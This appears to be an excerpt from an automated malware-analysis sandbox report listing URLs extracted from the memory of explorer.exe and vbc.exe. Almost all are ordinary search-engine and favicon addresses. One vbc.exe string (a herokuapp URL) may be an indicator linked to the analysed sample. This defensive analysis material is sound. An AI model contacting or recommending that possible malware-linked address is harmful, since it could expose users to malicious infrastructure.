          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2167595442.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2166745139.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: vbc.exe, 00000004.00000002.2157265721.000000000235A000.00000004.00000001.sdmpString found in binary or memory: http://thesnake.herokuapp.com/snakes
          Source: explorer.exe, 00000006.00000000.2167227314.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2167227314.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2166745139.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2178834889.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000000.2161587141.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: 32ED815C.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2167227314.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2166745139.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2167227314.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2166386042.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2175705501.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
